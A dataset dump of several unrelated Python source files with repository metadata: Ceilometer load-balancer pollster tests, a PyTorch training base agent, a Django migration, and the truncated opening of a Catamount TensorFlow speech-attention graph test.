self.CONF).discover(self.manager)
self.assertEqual(4, len(discovered_pools))
for pool in self.fake_get_pools():
if pool['status'] == 'error':
self.assertNotIn(pool, discovered_pools)
else:
self.assertIn(pool, discovered_pools)
class TestLBVipPollster(_BaseTestLBPollster):
def setUp(self):
super(TestLBVipPollster, self).setUp()
self.pollster = lbaas.LBVipPollster(self.CONF)
fake_vips = self.fake_get_vips()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'vip_get_all',
return_value=fake_vips))
@staticmethod
def fake_get_vips():
return [{'status': 'ACTIVE',
'status_description': None,
'protocol': 'HTTP',
'description': '',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'connection_limit': -1,
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'session_persistence': None,
'address': '10.0.0.2',
'protocol_port': 80,
'port_id': '3df3c4de-b32e-4ca1-a7f4-84323ba5f291',
'id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'myvip'},
{'status': 'INACTIVE',
'status_description': None,
'protocol': 'HTTP',
'description': '',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'connection_limit': -1,
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'session_persistence': None,
'address': '10.0.0.3',
'protocol_port': 80,
'port_id': '3df3c4de-b32e-4ca1-a7f4-84323ba5f291',
'id': 'ba6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'myvip02'},
{'status': 'PENDING_CREATE',
'status_description': None,
'protocol': 'HTTP',
'description': '',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'connection_limit': -1,
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'session_persistence': None,
'address': '10.0.0.4',
'protocol_port': 80,
'port_id': '3df3c4de-b32e-4ca1-a7f4-84323ba5f291',
'id': 'fg6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'myvip03'},
{'status': 'UNKNOWN',
'status_description': None,
'protocol': 'HTTP',
'description': '',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'connection_limit': -1,
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'session_persistence': None,
'address': '10.0.0.8',
'protocol_port': 80,
'port_id': '3df3c4de-b32e-4ca1-a7f4-84323ba5f291',
'id': 'fg6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'myvip03'},
{'status': 'error',
'status_description': None,
'protocol': 'HTTP',
'description': '',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'connection_limit': -1,
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'session_persistence': None,
'address': '10.0.0.8',
'protocol_port': 80,
'port_id': '3df3c4de-b32e-4ca1-a7f4-84323ba5f291',
'id': 'fg6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'myvip_error'},
]
def test_vip_get_samples(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_vips()))
self.assertEqual(4, len(samples))
for field in self.pollster.FIELDS:
self.assertEqual(self.fake_get_vips()[0][field],
samples[0].resource_metadata[field])
def test_pool_volume(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_vips()))
self.assertEqual(1, samples[0].volume)
self.assertEqual(0, samples[1].volume)
self.assertEqual(2, samples[2].volume)
def test_get_vip_meter_names(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_vips()))
self.assertEqual(set(['network.services.lb.vip']),
set([s.name for s in samples]))
def test_vip_discovery(self):
discovered_vips = discovery.LBVipsDiscovery(
self.CONF).discover(self.manager)
self.assertEqual(4, len(discovered_vips))
for pool in self.fake_get_vips():
if pool['status'] == 'error':
self.assertNotIn(pool, discovered_vips)
else:
self.assertIn(pool, discovered_vips)
class TestLBMemberPollster(_BaseTestLBPollster):
def setUp(self):
super(TestLBMemberPollster, self).setUp()
self.pollster = lbaas.LBMemberPollster(self.CONF)
fake_members = self.fake_get_members()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'member_get_all',
return_value=fake_members))
@staticmethod
def fake_get_members():
return [{'status': 'ACTIVE',
'protocol_port': 80,
'weight': 1,
'admin_state_up': True,
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'address': '10.0.0.3',
'status_description': None,
'id': '290b61eb-07bc-4372-9fbf-36459dd0f96b'},
{'status': 'INACTIVE',
'protocol_port': 80,
'weight': 1,
'admin_state_up': True,
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'address': '10.0.0.5',
'status_description': None,
'id': '2456661eb-07bc-4372-9fbf-36459dd0f96b'},
{'status': 'PENDING_CREATE',
'protocol_port': 80,
'weight': 1,
'admin_state_up': True,
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'address': '10.0.0.6',
'status_description': None,
'id': '45630b61eb-07bc-4372-9fbf-36459dd0f96b'},
{'status': 'UNKNOWN',
'protocol_port': 80,
'weight': 1,
'admin_state_up': True,
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'address': '10.0.0.6',
'status_description': None,
'id': '45630b61eb-07bc-4372-9fbf-36459dd0f96b'},
{'status': 'error',
'protocol_port': 80,
'weight': 1,
'admin_state_up': True,
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'address': '10.0.0.6',
'status_description': None,
'id': '45630b61eb-07bc-4372-9fbf-36459dd0f96b'},
]
def test_get_samples_not_empty(self):
samples = list(self.pollster.get_samples(
self.manager, {},
self.fake_get_members()))
self.assertEqual(4, len(samples))
for field in self.pollster.FIELDS:
self.assertEqual(self.fake_get_members()[0][field],
samples[0].resource_metadata[field])
def test_pool_volume(self):
samples = list(self.pollster.get_samples(
self.manager, {},
self.fake_get_members()))
self.assertEqual(1, samples[0].volume)
self.assertEqual(0, samples[1].volume)
self.assertEqual(2, samples[2].volume)
def test_get_meter_names(self):
samples = list(self.pollster.get_samples(
self.manager, {},
self.fake_get_members()))
self.assertEqual(set(['network.services.lb.member']),
set([s.name for s in samples]))
def test_members_discovery(self):
discovered_members = discovery.LBMembersDiscovery(
self.CONF).discover(self.manager)
self.assertEqual(4, len(discovered_members))
for pool in self.fake_get_members():
if pool['status'] == 'error':
self.assertNotIn(pool, discovered_members)
else:
self.assertIn(pool, discovered_members)
class TestLBHealthProbePollster(_BaseTestLBPollster):
def setUp(self):
super(TestLBHealthProbePollster, self).setUp()
self.pollster = lbaas.LBHealthMonitorPollster(self.CONF)
fake_health_monitor = self.fake_get_health_monitor()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'health_monitor_get_all',
return_value=fake_health_monitor))
@staticmethod
def fake_get_health_monitor():
return [{'id': '34ae33e1-0035-49e2-a2ca-77d5d3fab365',
'admin_state_up': True,
'tenant_id': "d5d2817dae6b42159be9b665b64beb0e",
'delay': 2,
'max_retries': 5,
'timeout': 5,
'pools': [],
'type': 'PING',
}]
def test_get_samples_not_empty(self):
samples = list(self.pollster.get_samples(
self.manager, {},
self.fake_get_health_monitor()))
self.assertEqual(1, len(samples))
for field in self.pollster.FIELDS:
self.assertEqual(self.fake_get_health_monitor()[0][field],
samples[0].resource_metadata[field])
def test_get_meter_names(self):
samples = list(self.pollster.get_samples(
self.manager, {},
self.fake_get_health_monitor()))
self.assertEqual(set(['network.services.lb.health_monitor']),
set([s.name for s in samples]))
def test_probes_discovery(self):
discovered_probes = discovery.LBHealthMonitorsDiscovery(
self.CONF).discover(self.manager)
self.assertEqual(discovered_probes, self.fake_get_health_monitor())
class TestLBStatsPollster(_BaseTestLBPollster):
def setUp(self):
super(TestLBStatsPollster, self).setUp()
fake_pool_stats = self.fake_pool_stats()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'pool_stats',
return_value=fake_pool_stats))
fake_pools = self.fake_get_pools()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'pool_get_all',
return_value=fake_pools))
@staticmethod
def fake_get_pools():
return [{'status': 'ACTIVE',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
]
@staticmethod
def fake_pool_stats():
return {'stats': {'active_connections': 2,
'bytes_in': 1,
'bytes_out': 3,
'total_connections': 4
}
}
@mock.patch('ceilometer.pipeline.setup_pipeline', mock.MagicMock())
def _check_get_samples(self, factory, sample_name, expected_volume,
expected_type):
pollster = factory(self.CONF)
cache = {}
samples = list(pollster.get_samples(self.manager, cache,
self.fake_get_pools()))
self.assertEqual(1, len(samples))
self.assertIsNotNone(samples)
self.assertIn('lbstats', cache)
self.assertEqual(set([sample_name]), set([s.name for s in samples]))
match = [s for s in samples if s.name == sample_name]
self.assertEqual(1, len(match), 'missing counter %s' % sample_name)
self.assertEqual(expected_volume, match[0].volume)
self.assertEqual(expected_type, match[0].type)
def test_lb_total_connections(self):
self._check_get_samples(lbaas.LBTotalConnectionsPollster,
'network.services.lb.total.connections',
4, 'cumulative')
def test_lb_active_connections(self):
self._check_get_samples(lbaas.LBActiveConnectionsPollster,
'network.services.lb.active.connections',
2, 'gauge')
def test_lb_incoming_bytes(self):
self._check_get_samples(lbaas.LBBytesInPollster,
'network.services.lb.incoming.bytes',
1, 'gauge')
def test_lb_outgoing_bytes(self):
self._check_get_samples(lbaas.LBBytesOutPollster,
'network.services.lb.outgoing.bytes',
3, 'gauge')
```
avg_line_length: 42.478431 | max_line_length: 76 | alphanum_fraction: 0.537851
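The assertions above pin down how pollster sample volumes relate to resource status (ACTIVE becomes 1, INACTIVE becomes 0, PENDING_CREATE becomes 2) and show that resources in the 'error' state are dropped by discovery. The sketch below encodes just that mapping as a plain dict; it is illustrative and not taken from the ceilometer source.

```python
# Illustrative status-to-volume mapping, consistent with the test assertions above
# (not copied from ceilometer; the real mapping lives in ceilometer.network.services).
STATUS_VOLUME = {'active': 1, 'inactive': 0, 'pending_create': 2}

def sample_volume(resource: dict) -> int:
    """Gauge value a pollster would emit; -1 marks statuses the tests do not pin down."""
    return STATUS_VOLUME.get(resource['status'].lower(), -1)

pools = [{'status': s} for s in ('ACTIVE', 'INACTIVE', 'PENDING_CREATE', 'UNKNOWN')]
print([sample_volume(p) for p in pools])  # [1, 0, 2, -1]
```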
hexsha: ba323774a59b547fd8a938faf28e9dfff1cccac3 | size: 15,039 | ext: py | lang: Python
max_stars_repo_path: deepkt/agents/base.py | max_stars_repo_name: persai-lab/EDM2020-DMKT | max_stars_repo_head_hexsha: ded1e76a5908432f5b927fc3bda7c0e059e2bc00 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 4 | max_stars_repo_stars_event_min_datetime: 2021-05-28T13:15:18.000Z | max_stars_repo_stars_event_max_datetime: 2021-12-15T22:29:28.000Z
max_issues_repo_path: deepkt/agents/base.py | max_issues_repo_name: persai-lab/EDM2021-DMKT | max_issues_repo_head_hexsha: ded1e76a5908432f5b927fc3bda7c0e059e2bc00 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: deepkt/agents/base.py | max_forks_repo_name: persai-lab/EDM2021-DMKT | max_forks_repo_head_hexsha: ded1e76a5908432f5b927fc3bda7c0e059e2bc00 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
```python
"""
The Base Agent class that all other agents inherit from; it contains definitions for all the necessary functions
"""
import logging
import torch
import shutil
import numpy as np
from sklearn import metrics
import pickle
import torch.nn as nn
from tensorboardX.writer import SummaryWriter
from deepkt.utils.metrics import AverageMeter, AverageMeterList
class BaseAgent:
"""
This base class will contain the base functions to be overloaded by any agent you will implement.
"""
def __init__(self, config):
self.config = config
self.logger = logging.getLogger("Agent")
self.current_epoch = None
self.current_iteration = None
self.model = None
self.optimizer = None
self.data_loader = None
# initialize counter
self.current_epoch = 0
self.current_iteration = 0
self.best_metric = 0
# set cuda flag
self.is_cuda = torch.cuda.is_available()
if self.is_cuda and not self.config.cuda:
self.logger.info("WARNING: You have a CUDA device, so you should probably enable CUDA")
self.cuda = self.is_cuda & self.config.cuda
# set the manual seed for torch
self.manual_seed = config.seed
self.mode = config.mode
self.device = torch.device("cpu")
# Summary Writer
self.summary_writer = None
self.true_labels = None
self.pred_labels = None
self.best_epoch = None
self.train_loss = None
self.train_loss_list = []
self.best_train_loss = None
self.best_val_perf = None
self.metric = config.metric
self.save = config.save_checkpoint
if self.metric == "rmse":
self.best_val_perf = 1.
elif self.metric == "auc":
self.best_val_perf = 0.
else:
raise AttributeError
if "target_train_loss" in config:
self.target_train_loss = config.target_train_loss
else:
self.target_train_loss = None
def load_checkpoint(self, file_name):
"""
Latest checkpoint loader
:param file_name: name of the checkpoint file
:return:
"""
filename = self.config.checkpoint_dir + file_name
try:
self.logger.info("Loading checkpoint '{}'".format(filename))
checkpoint = torch.load(filename)
self.current_epoch = checkpoint['epoch']
self.current_iteration = checkpoint['iteration']
self.model.load_state_dict(checkpoint['state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer'])
self.logger.info(f"Checkpoint loaded successfully from '{self.config.checkpoint_dir}' "
f"at (epoch {checkpoint['epoch']}) at (iteration "
f"{checkpoint['iteration']})\n")
except OSError as e:
self.logger.info(f"No checkpoint exists from '{self.config.checkpoint_dir}'. "
f"Skipping...")
self.logger.info("**First time to train**")
def save_checkpoint(self, file_name="checkpoint.pth.tar", is_best=0):
"""
Checkpoint saver
:param file_name: name of the checkpoint file
:param is_best: boolean flag to indicate whether current checkpoint's accuracy is
the best so far
:return:
"""
state = {
'epoch': self.current_epoch,
'iteration': self.current_iteration,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
}
# Save the state
torch.save(state, self.config.checkpoint_dir + file_name)
# If it is the best copy it to another file 'model_best.pth.tar'
if is_best:
shutil.copyfile(self.config.checkpoint_dir + file_name,
self.config.checkpoint_dir + 'model_best.pth.tar')
def save_results(self):
torch.save(self.true_labels, self.config.out_dir + "true_labels.tar")
torch.save(self.pred_labels, self.config.out_dir + "pred_labels.tar")
def track_best(self, true_labels, pred_labels):
self.pred_labels = np.array(pred_labels).squeeze()
self.true_labels = np.array(true_labels).squeeze()
self.logger.info(
"pred size: {} true size {}".format(self.pred_labels.shape, self.true_labels.shape))
if self.metric == "rmse":
perf = np.sqrt(metrics.mean_squared_error(self.true_labels, self.pred_labels))
self.logger.info('RMSE: {:.05}'.format(perf))
if perf < self.best_val_perf:
self.best_val_perf = perf
self.best_train_loss = self.train_loss.item()
self.best_epoch = self.current_epoch
elif self.metric == "auc":
perf = metrics.roc_auc_score(self.true_labels, self.pred_labels)
prec, rec, _ = metrics.precision_recall_curve(self.true_labels, self.pred_labels)
pr_auc = metrics.auc(rec, prec)
self.logger.info('ROC-AUC: {:.05}'.format(perf))
self.logger.info('PR-AUC: {:.05}'.format(pr_auc))
if perf > self.best_val_perf:
self.best_val_perf = perf
self.best_train_loss = self.train_loss.item()
self.best_epoch = self.current_epoch
else:
raise AttributeError
def early_stopping(self):
if self.mode == "test":
if self.target_train_loss is not None and self.train_loss <= self.target_train_loss:
# early stop, target train loss comes from hyperparameters tuning step.
self.logger.info("Early stopping...")
self.logger.info("Target Train Loss: {}".format(self.target_train_loss))
self.logger.info("Current Train Loss: {}".format(self.train_loss))
return True
# elif self.current_epoch > 10:
# if self.train_loss > torch.mean(self.train_loss_list[-10:]):
# return True
# else:
# self.train_loss_list.append(self.train_loss)
def run(self):
"""
The main operator
:return:
"""
if self.mode in ["train", "test"]:
try:
self.train()
except KeyboardInterrupt:
self.logger.info("You have entered CTRL+C.. Wait to finalize")
elif self.mode == "predict":
self.predict()
else:
print(self.mode)
raise ValueError
def train(self):
"""
Main training loop
:return:
"""
raise NotImplementedError
def train_one_epoch(self):
"""
One epoch of training
:return:
"""
raise NotImplementedError
def validate(self):
"""
One cycle of model validation
:return:
"""
raise NotImplementedError
def finalize(self):
"""
        Finalize all the operations of the 2 main classes of the process: the operator and the data loader
:return:
"""
self.logger.info("Please wait while finalizing the operation.. Thank you")
self.logger.info("Saving checkpoint...")
if self.save is True:
self.save_checkpoint()
self.save_results()
# self.summary_writer.export_scalars_to_json(
# "{}all_scalars.json".format(self.config.summary_dir))
# self.summary_writer.close()
self.data_loader.finalize()
return self.best_epoch, self.best_train_loss, self.best_val_perf
# def depict_knowledge_quiz_only(self, q_data, qa_data, l_data, idx):
# if self.metric == "rmse":
# qa_data = qa_data.float()
# # batch_size, seq_len = q_data.size(0), q_data.size(1)
# batch_size, seq_len, lec_len = l_data.size(0), l_data.size(1), l_data.size(2)
# self.model.value_matrix = torch.Tensor(self.model.num_concepts, self.model.value_dim).to(
# self.device)
# nn.init.normal_(self.model.value_matrix, mean=0., std=self.model.init_std)
# self.model.value_matrix = self.model.value_matrix.clone().repeat(batch_size, 1, 1)
#
# q_embed_data = self.model.q_embed_matrix(q_data)
# qa_embed_data = self.model.qa_embed_matrix(qa_data)
# # split the data seq into chunk and process.py each question sequentially
# sliced_q_embed_data = torch.chunk(q_embed_data, seq_len, dim=1)
# sliced_qa_embed_data = torch.chunk(qa_embed_data, seq_len, dim=1)
#
# l_read_content = torch.Tensor(batch_size, self.model.value_dim).to(self.device)
# ls = torch.Tensor(batch_size, self.model.value_dim).to(self.device)
# sliced_l_data = torch.chunk(l_data, seq_len, dim=1) # seq_len * (batch_size, 1, lec_len)
#
# knowledge_state = []
# for i in range(seq_len):
# qid = q_data.squeeze()[i]
# print("question: {}".format(qid))
# if qid == 0:
# continue
#
# q = sliced_q_embed_data[i].squeeze(1) # (batch_size, key_dim)
# qa = sliced_qa_embed_data[i].squeeze(1) # (batch_size, key_dim)
# q_correlation_weight = self.model.compute_correlation_weight(q)
# q_read_content = self.model.read(q_correlation_weight)
#
# masked_summary_fc = nn.Linear(2 * self.model.key_dim + 2 * self.model.value_dim,
# self.model.summary_dim).to(self.device)
# mask_used = torch.zeros(
# self.model.summary_dim,
# 2 * self.model.key_dim + 2 * self.model.value_dim
# ).to(self.device)
# mask_used[:, :self.model.key_dim] = 1.
#
# # print(self.model.state_dict()["summary_fc.weight"].shape)
# # print(mask_used.shape)
# masked_summary_fc.weight.data = self.model.state_dict()["summary_fc.weight"] * mask_used
# masked_summary_fc.bias.data = self.model.state_dict()["summary_fc.bias"]
# cws = torch.eye(self.model.num_concepts).to(self.device)
# current_state = []
# for cw in cws:
# nn.init.zeros_(l_read_content)
# nn.init.zeros_(ls)
# read_content = self.model.read(cw)
# mastery_level = torch.cat([read_content, q, l_read_content, ls], dim=1)
# summary_output = self.model.tanh(masked_summary_fc(mastery_level))
# batch_sliced_pred = self.model.sigmoid(self.model.linear_out(summary_output))
# current_state.append(batch_sliced_pred.squeeze().item())
# knowledge_state.append(current_state)
# self.model.value_matrix = self.model.write(q_correlation_weight, qa)
#
# # after update value_matrix with qa_data, we test the knowledge
# # should not change the order of code
# nn.init.zeros_(l_read_content)
# nn.init.zeros_(ls)
# # (batch_size, 128, value_dim)
# l_embed_data = self.model.l_embed_matrix(sliced_l_data[i].squeeze(1).long())
# # print(l_embed_data.shape)
# sliced_l_embed_data = torch.chunk(l_embed_data, lec_len, dim=1)
# # 128 * (batch_size, 1, value_dim)
#
#
# # masked_summary_fc = nn.Linear(2 * self.model.key_dim + 2 * self.model.value_dim,
# # self.model.summary_dim).to(self.device)
# # mask_used = torch.zeros(self.model.summary_dim,
# # 2 * self.model.key_dim + 2 * self.model.value_dim).to(
# # self.device)
# # mask_used[:, 2 * self.model.key_dim:3 * self.model.key_dim] = 1.
# # masked_summary_fc.weight.data = self.model.state_dict()["summary_fc.weight"] * mask_used
# # masked_summary_fc.bias.data = self.model.state_dict()["summary_fc.bias"]
# #
# # cws = torch.eye(self.model.num_concepts).to(self.device)
# # current_state = []
# # for cw in cws:
# # read_content = self.model.read(cw)
# # mastery_level = torch.cat([q_read_content, q, read_content, ls], dim=1)
# # summary_output = self.model.tanh(masked_summary_fc(mastery_level))
# # batch_sliced_pred = self.model.sigmoid(self.model.linear_out(summary_output))
# # current_state.append(batch_sliced_pred.squeeze().item())
# # knowledge_state.append(current_state)
#
# nn.init.zeros_(l_read_content)
# nn.init.zeros_(ls)
# # (batch_size, 128, value_dim)
# l_embed_data = self.model.l_embed_matrix(sliced_l_data[i].squeeze(1).long())
# # print(l_embed_data.shape)
# sliced_l_embed_data = torch.chunk(l_embed_data, lec_len, dim=1)
# # 128 * (batch_size, 1, value_dim)
# for j in range(lec_len):
# l = sliced_l_embed_data[j].squeeze(1) # (batch_size, value_dim)
# l_correlation_weight = self.model.compute_correlation_weight(l)
# l_read_content += self.model.read(l_correlation_weight)
# self.model.value_matrix = self.model.write(l_correlation_weight, l)
# ls += l
#
# # get the knowledge transition over different lectures
# # print("lectures: {}".format(sliced_l_data[i].squeeze(1)))
# # for j in range(lec_len):
# # if sliced_l_data[i].squeeze(1).squeeze(0)[j] == 0:
# # continue
# #
# # current_state = []
# # cws = torch.eye(self.model.num_concepts).to(self.device)
# # for cw in cws:
# # read_content = self.model.read(cw)
# # mastery_level = torch.cat([q_read_content, q, read_content, ls], dim=1)
# # summary_output = self.model.tanh(masked_summary_fc(mastery_level))
# # batch_sliced_pred = self.model.sigmoid(self.model.linear_out(summary_output))
# # current_state.append(batch_sliced_pred.squeeze().item())
# #
# # l = sliced_l_embed_data[j].squeeze(1) # (batch_size, value_dim)
# # l_correlation_weight = self.model.compute_correlation_weight(l)
# # l_read_content = self.model.read(l_correlation_weight)
# # self.model.value_matrix = self.model.write(l_correlation_weight, l)
# # ls += l
# # knowledge_state.append(current_state)
#
# knowledge_state = np.array(knowledge_state)
# print(knowledge_state.shape)
# torch.save(knowledge_state, self.config.out_dir + "K_{}.pkl".format(idx))
```
avg_line_length: 44.758929 | max_line_length: 116 | alphanum_fraction: 0.587606
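`save_checkpoint` and `load_checkpoint` above revolve around a plain dict of epoch, iteration, model state, and optimizer state. A minimal standalone round trip of that format follows; the toy model and file name are assumptions, not deepkt code.

```python
import torch
import torch.nn as nn

# Toy model/optimizer standing in for self.model / self.optimizer in BaseAgent.
model = nn.Linear(4, 2)
optimizer = torch.optim.Adam(model.parameters())

state = {
    'epoch': 3,
    'iteration': 1200,
    'state_dict': model.state_dict(),
    'optimizer': optimizer.state_dict(),
}
torch.save(state, 'checkpoint.pth.tar')          # what save_checkpoint writes

checkpoint = torch.load('checkpoint.pth.tar')    # what load_checkpoint reads back
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print(checkpoint['epoch'], checkpoint['iteration'])
```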
hexsha: e8aa74c5fe301a4826d146850852432194386fa6 | size: 397 | ext: py | lang: Python
max_stars_repo_path: store/migrations/0007_alter_product_slug.py | max_stars_repo_name: LhermannSauer/online-store_Django-project_-codewithMosh | max_stars_repo_head_hexsha: 5c00588caadfefba65b6d0bab4fae5058cdddee4 | max_stars_repo_licenses: ["MIT"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: store/migrations/0007_alter_product_slug.py | max_issues_repo_name: LhermannSauer/online-store_Django-project_-codewithMosh | max_issues_repo_head_hexsha: 5c00588caadfefba65b6d0bab4fae5058cdddee4 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: store/migrations/0007_alter_product_slug.py | max_forks_repo_name: LhermannSauer/online-store_Django-project_-codewithMosh | max_forks_repo_head_hexsha: 5c00588caadfefba65b6d0bab4fae5058cdddee4 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
```python
# Generated by Django 3.2.4 on 2021-09-02 01:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0006_alter_product_collection'),
]
operations = [
migrations.AlterField(
model_name='product',
name='slug',
field=models.SlugField(blank=True, null=True),
),
]
```
avg_line_length: 20.894737 | max_line_length: 58 | alphanum_fraction: 0.602015
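For context, an `AlterField` migration like this one is generated from a one-line change on the model. A hedged sketch of the corresponding field definition follows; only the `slug` line is implied by the migration, and the rest of the `Product` model is assumed.

```python
from django.db import models

class Product(models.Model):
    # Other fields omitted/assumed; only the slug definition below is implied
    # by the AlterField operation in the migration above.
    title = models.CharField(max_length=255)
    slug = models.SlugField(blank=True, null=True)
```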
hexsha: be681f7296bcf49ab215efeda4f2ca8630296468 | size: 36,381 | ext: py | lang: Python
max_stars_repo_path: catamount/tests/full/tf_speech_attention.py | max_stars_repo_name: baidu-research/catamount | max_stars_repo_head_hexsha: 4591f797bb9a8a70598c6d5a85551a6ec92ef7e3 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: 13 | max_stars_repo_stars_event_min_datetime: 2018-12-18T04:09:22.000Z | max_stars_repo_stars_event_max_datetime: 2020-08-17T22:51:25.000Z
max_issues_repo_path: dl_modifier/tests/full/tf_speech_attention.py | max_issues_repo_name: nikkkkhil/dl_modifier | max_issues_repo_head_hexsha: d9c3f7c31db54e51aa5fa2bca2688f337a7f318f | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: 6 | max_issues_repo_issues_event_min_datetime: 2018-12-20T00:21:00.000Z | max_issues_repo_issues_event_max_datetime: 2019-08-01T02:01:12.000Z
max_forks_repo_path: dl_modifier/tests/full/tf_speech_attention.py | max_forks_repo_name: nikkkkhil/dl_modifier | max_forks_repo_head_hexsha: d9c3f7c31db54e51aa5fa2bca2688f337a7f318f | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: 4 | max_forks_repo_forks_event_min_datetime: 2018-11-23T19:14:25.000Z | max_forks_repo_forks_event_max_datetime: 2019-10-28T07:53:03.000Z
content:
```python
import numpy as np
import pickle
import sympy
import sys
sys.setrecursionlimit(50000)
from catamount.api import utils
import catamount.frameworks.tensorflow
from catamount.ops.constant import *
from catamount.ops.unknown_op import UnknownOp
from catamount.ops.variable import *
is_pytest_run = False
def test_tf_speech_attention():
global is_pytest_run
is_pytest_run = True
run_tf_speech_attention()
def run_tf_speech_attention():
global is_pytest_run
graph_meta = 'catamount/frameworks/example_graphs/tensorflow/full_models/speech_attention/model.ckpt.meta'
graph = catamount.frameworks.tensorflow.import_graph(graph_meta)
assert graph.isValid()
# HAX: NEED TO MANUALLY REMOVE SOME?! WHY?
remove_ops = ['DevArgmaxWERChecker/Less', 'DevLossChecker/Less', 'DevArgmaxWERChecker/best_dev', 'DevLossChecker/best_dev']
for op_name in remove_ops:
op = graph.opsByName[op_name]
graph.removeOp(op)
assert graph.isValid()
# Remove ops that are not executed during a standard training step:
graph_ops = list(graph._ops_by_name.values())
for op in graph_ops:
# Ops in attn_model_[1-3] are used for inference
if 'attn_model_1' in op.name or \
'attn_model_2' in op.name or \
'attn_model_3' in op.name:
graph.removeOp(op)
assert graph.isValid()
print('Initial graph:\n{}\n'.format(graph))
init_params = graph.calcModelParameters()
print('Initial parameters: {}'.format(init_params))
print('Initial Flops: {}\n'.format(graph.calcAlgFlops()))
print('Placeholders:')
for op in graph.getPlaceholders():
print(op.debugString())
print('')
# Set up symbols to name dimensions
audio_features_symbol = utils.getPositiveIntSymbolFromString('audio_features')
encoder_steps_symbol = utils.getPositiveIntSymbolFromString('encoder_steps')
decoder_steps_symbol = utils.getPositiveIntSymbolFromString('decoder_steps')
subbatch_size_symbol = utils.getPositiveIntSymbolFromString('subbatch_size')
attn_dim_symbol = utils.getPositiveIntSymbolFromString('attn_dim')
attn_hidden_dim_symbol = utils.getPositiveIntSymbolFromString('attn_hidden_dim')
dec_hidden_dim_symbol = utils.getPositiveIntSymbolFromString('dec_hidden_dim')
enc_hidden_dim_symbol = utils.getPositiveIntSymbolFromString('enc_hidden_dim')
graph_iters_symbol = utils.getIntSymbolFromString('graph::iters')
output_vocab_symbol = utils.getPositiveIntSymbolFromString('output_vocab')
conv_width_symbol = utils.getPositiveIntSymbolFromString('conv_width')
num_conv_filters_symbol = utils.getPositiveIntSymbolFromString('num_conv_filters')
# Convert these constant dimensions to symbols
base_encoder_steps = 300
base_decoder_steps = 300
base_subbatch_size = 32
base_output_vocab = 31
base_audio_features = 40
base_conv_width = 53
base_attn_dim = 137
base_attn_hidden_dim = 509
